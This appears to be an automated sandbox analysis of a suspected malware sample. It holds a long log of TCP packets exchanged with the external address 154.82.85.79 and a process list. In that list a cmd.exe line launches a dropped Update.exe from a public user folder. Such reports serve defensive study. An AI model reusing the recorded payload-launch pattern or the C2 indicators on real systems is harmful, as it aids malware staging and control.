                                            Dec 30, 2024 03:44:27.499887943 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.499897957 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.499907970 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.499914885 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.499917984 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.499924898 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.499934912 CET1885249899154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:27.499948025 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:27.499975920 CET4989918852192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:29.541121006 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:29.546030998 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:29.546089888 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:29.546494007 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:29.551297903 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:30.392494917 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:30.392832994 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:30.397690058 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:30.397701979 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:30.397703886 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:30.958779097 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:30.958792925 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:30.958811045 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:30.958822012 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:30.958832979 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:30.958843946 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:30.958863974 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:30.958899021 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.172261000 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.172283888 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.172296047 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.172307014 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.172318935 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.172350883 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.172704935 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.172718048 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.172766924 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.172940016 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.172971964 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.173362970 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.385560989 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.385695934 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.385709047 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.385720015 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.385756016 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.385801077 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.385931969 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.385948896 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.385960102 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.385974884 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.385987043 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.386004925 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.386024952 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.386814117 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.386826038 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.386837006 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.386852026 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.386862040 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.386969090 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.386969090 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.386969090 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.599015951 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.599030972 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.599040985 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.599050999 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.599061966 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.599071980 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.599072933 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.599107981 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.599370003 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.599387884 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.599530935 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.599648952 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.599689960 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.599701881 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.599713087 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.599736929 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.599822998 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.600274086 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.600285053 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.600291967 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.600311995 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.600328922 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.600332022 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.600337982 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.600374937 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.600390911 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.601176023 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.641030073 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.812361956 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.812453985 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.812463999 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.812475920 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.812484980 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.812524080 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.812535048 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.812546015 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.812551022 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.812556028 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.812582016 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.812634945 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.813374043 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.813385963 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.813393116 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.813402891 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.813414097 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.813424110 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.813431978 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.813435078 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.813446045 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.813446045 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.813481092 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.813481092 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.814323902 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.814340115 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.814351082 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.814362049 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.814373016 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.814383030 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:31.814388037 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.814388037 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:31.814431906 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.025533915 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.025551081 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.025561094 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.025630951 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.025634050 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.025645971 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.025659084 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.025672913 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.025711060 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.025918007 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.025928974 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.025939941 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.025949955 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.025960922 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.025962114 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.025983095 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.026422024 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.026432991 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.026443005 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.026467085 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.026488066 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.026669979 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.026680946 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.026686907 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.026695967 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.026711941 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.026721954 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.026722908 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.026734114 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.026743889 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.026753902 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.026757002 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.026762009 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.026783943 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.027509928 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.027549982 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.027662039 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.027673006 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.027688980 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.027695894 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.027698040 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.027704954 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.027715921 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.027726889 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.027726889 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.027746916 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.027764082 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.028451920 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.028469086 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.028480053 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.028506041 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.078447104 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.238949060 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.238961935 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.238971949 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239029884 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.239125967 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239136934 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239146948 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239156008 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239166021 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239176989 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.239227057 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.239227057 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.239362001 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239378929 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239391088 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239399910 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239411116 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239429951 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.239453077 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.239814043 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239824057 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239834070 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239845037 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239854097 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239864111 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.239865065 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.239871025 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.239895105 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.240304947 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.240314960 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.240324974 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.240334988 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.240345955 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.240354061 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.240355968 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.240361929 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.240366936 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.240382910 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.240386009 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.240392923 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.240405083 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.240411997 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.240415096 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.240427017 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.240439892 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.240468979 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.241173983 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.241184950 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.241195917 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.241205931 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.241215944 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.241218090 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.241225958 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.241235971 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.241238117 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.241245985 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.241255999 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.241265059 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.241266966 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.241275072 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.241286993 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.241307020 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.241326094 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.242018938 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.242028952 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.242039919 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.242064953 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.242078066 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.242089033 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.242090940 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.242100000 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.242120028 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.281608105 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.452647924 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.452661991 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.452673912 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.452683926 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.452693939 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.452694893 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.452704906 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.452714920 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.452724934 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.452727079 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.452733994 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.452737093 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.452747107 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.452758074 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.452795029 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.452939034 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.452950001 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.452960014 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.452965021 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.452976942 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.452976942 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.452991009 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.453001976 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.453002930 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.453011990 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.453021049 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.453023911 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.453031063 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.453042030 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.453042984 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.453071117 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:32.535073042 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.535167933 CET1809149924154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:32.535232067 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:33.563280106 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:33.568223953 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:33.568317890 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:35.547398090 CET4992418091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:39.469986916 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:39.474900007 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:39.474920988 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:39.474934101 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:39.474948883 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:39.775757074 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:39.775994062 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:39.780817986 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:50.485191107 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:50.490320921 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:50.788635015 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:44:50.844116926 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:50.858216047 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:44:50.863198996 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:45:07.453646898 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:45:07.458610058 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:45:07.756974936 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:45:07.797293901 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:45:07.834187031 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:45:07.839039087 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:45:23.594284058 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:45:23.599169970 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:45:23.897444010 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:45:23.938046932 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:45:23.976100922 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:45:23.981472015 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:45:39.297430038 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:45:39.302398920 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:45:39.600620031 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:45:39.641175985 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:45:39.686984062 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:45:39.691849947 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:45:55.766170979 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:45:55.771025896 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:45:56.069291115 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:45:56.109872103 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:45:56.169076920 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:45:56.173959017 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:46:11.985563993 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:46:11.990529060 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:46:12.288852930 CET1809149953154.82.85.79192.168.2.4
                                            Dec 30, 2024 03:46:12.344314098 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:46:12.673295021 CET4995318091192.168.2.4154.82.85.79
                                            Dec 30, 2024 03:46:12.678132057 CET1809149953154.82.85.79192.168.2.4

                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:21:43:04
                                            Start date:29/12/2024
                                            Path:C:\Users\user\Desktop\6f0slJzOrF.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\6f0slJzOrF.exe"
                                            Imagebase:0x400000
                                            File size:73'598'737 bytes
                                            MD5 hash:E0B31F24AA1B867B395D4F62F15DC51A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:1
                                            Start time:21:43:14
                                            Start date:29/12/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

